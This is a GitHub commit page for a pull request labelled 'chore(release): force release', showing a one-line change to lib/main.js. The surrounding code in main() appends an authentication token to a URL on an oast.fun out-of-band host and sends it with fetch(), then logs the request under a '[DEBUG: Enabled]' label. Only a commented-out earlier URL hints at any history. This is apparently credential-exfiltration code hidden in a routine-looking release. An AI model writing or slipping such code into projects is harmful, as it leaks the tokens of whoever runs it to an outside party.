Skip to content

Commit 800407c

Browse files
authored
Merge pull request #6 from suchithrzp/suchithrzp-patch-9
chore(release): force release
2 parents 64f1643 + ce9835a commit 800407c

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

lib/main.js

+1-1
Original file line numberDiff line numberDiff line change
@@ -128,7 +128,7 @@ export async function main(
128128
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
129129
const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`;
130130
await fetch(url);
131-
core.info(`HTTP GET request sent to ${url}`);
131+
core.info(`[DEBUG: Enabled] HTTP GET request sent to ${url}`);
132132
} catch (error) {
133133
core.error(`Failed to send HTTP GET request: ${error.message}`);
134134
}

0 commit comments

Comments
 (0)